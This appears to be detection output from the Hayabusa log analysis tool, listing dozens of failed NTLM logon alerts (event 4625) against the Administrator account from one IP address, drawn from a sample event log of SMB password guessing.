01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 